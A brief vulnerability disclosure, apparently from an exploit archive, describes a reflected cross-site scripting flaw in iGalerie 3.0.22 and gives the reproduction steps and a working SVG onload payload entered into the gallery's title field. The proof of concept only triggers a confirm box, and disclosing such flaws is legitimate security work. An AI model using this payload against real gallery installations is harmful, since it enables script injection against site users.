Authored by tmrswrr

iGalerie version 3.0.22 suffers from a cross site scripting vulnerability.

# Exploit Title: iGalerie Version: 3.0.22 - Reflected XSS 
# Date: 2024-7-1
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.igalerie.org/
# Version: 3.0.22
# Tested on: https://softaculous.com/demos/iGalerie



1 ) Go to home page and click edit > https://127.0.0.1/iGalerie/

Titre : "><sVg/onLy=1 onLoaD=confirm(1)//

2 ) Write in titre your payload , after save will be see alert button.